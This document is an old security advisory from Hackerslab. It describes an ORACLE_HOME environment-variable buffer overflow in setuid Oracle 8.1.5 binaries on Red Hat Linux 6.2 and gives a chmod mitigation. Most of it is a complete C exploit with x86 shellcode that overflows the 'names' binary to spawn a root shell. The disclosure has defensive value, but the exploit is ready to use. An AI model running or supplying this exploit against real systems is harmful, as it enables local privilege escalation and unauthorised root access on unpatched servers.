[ SOURCE: http://www.secureroot.com/security/advisories/9735731635.html ] ================================================================================ [ Hackerslab bug_paper ] Linux ORACLE 8.1.5 vulnerability ================================================================================ File : Oracle 8.1.5 SYSTEM : LINUX Tested by RedHat Linux 6.2 INFO : There are two security vulnerability in Oracle. 1. buffer overflow It is possible to create a buffer overflow vulnerability using "ORACLE_HOME", one of the environmental value of Oracle. Oracle applications that are vulnerable to buffer overflow are as follow : - names - namesctl - onrsd - osslogin - tnslsnr - tnsping - trcasst - trcroute Thease applications allow an attacker to excute a buffer overflow exploit. 2. Log-files created When a user excutes one of Oracle applications such as names, oracle or tnslsnr, following log files are created. names ====== -rw-rw-r-- 1 oracle dba 0 Oct 20 01:45 ckpcch.ora -rw-rw-r-- 1 oracle dba 428 Oct 20 01:45 ckpreg.ora -rw-rw-r-- 1 oracle dba 950 Oct 20 01:45 names.log oracle ====== -rw-rw---- 1 oracle dba 616 Oct 20 05:14 ora_[running pid].trc tnslsnr ======= -rw-rw-r-- 1 oracle dba 2182176 Oct 20 2000 listener.log SOLUTION Contact your vendor for a patch or close setuid permission. # su - oracle $ cd /oracle_8.1.5_install_directory/bin $ chmod a-s names namesctl onrsd osslogin tnslsnr tnsping trcasst trcroute ==-------------------------------------------------------------------------------== ******** * ** ** * * ** ** * * ****** * * ** ** * loveyou@hackerslab.org [yong-jun, kim] * ** ** * [ http://www.hackerslab.org ] ******** HACKERSLAB (C) since 1999 ==-------------------------------------------------------------------------------== /* Oracle 8.1.5 exploit -by loveyou offset value : -500 ~ +500 */ #include #include #define BUFFER 800 #define NOP 0x90 #define PATH "/hackerslab/loveyou/oracle/8.1.5/bin/names" char shellcode[] = /* - K2 - */ /* main: */ "\xeb\x1d" /* jmp callz */ /* start: */ "\x5e" /* popl %esi */ "\x29\xc0" /* subl %eax, %eax */ "\x88\x46\x07" /* movb %al, 0x07(%esi) */ "\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */ "\x89\x76\x08" /* movl %esi, 0x08(%esi) */ "\xb0\x0b" /* movb $0x0b, %al */ "\x87\xf3" /* xchgl %esi, %ebx */ "\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */ "\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */ "\xcd\x80" /* int $0x80 */ "\x29\xc0" /* subl %eax, %eax */ "\x40" /* incl %eax */ "\xcd\x80" /* int $0x80 */ /* callz: */ "\xe8\xde\xff\xff\xff" /* call start */ "/bin/sh"; unsigned long getesp(void) { __asm__("movl %esp,%eax"); } int main(int argc, char *argv[]) { char *buff, *ptr,binary[120]; long *addr_ptr, addr; int bsize=BUFFER; int i,offset; offset = 0 ; if ( argc > 1 ) offset = atoi(argv[1]); buff = malloc(bsize); addr = getesp() - 5933 - offset; ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; memset(buff,bsize/2,NOP); ptr = buff + ((bsize/2) - (strlen(shellcode)/2)); for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; setenv("ORACLE_HOME",buff,1); printf("[ offset:%d buffer=%d ret:0x%x ]\n", offset,strlen(buff),addr); system(PATH); }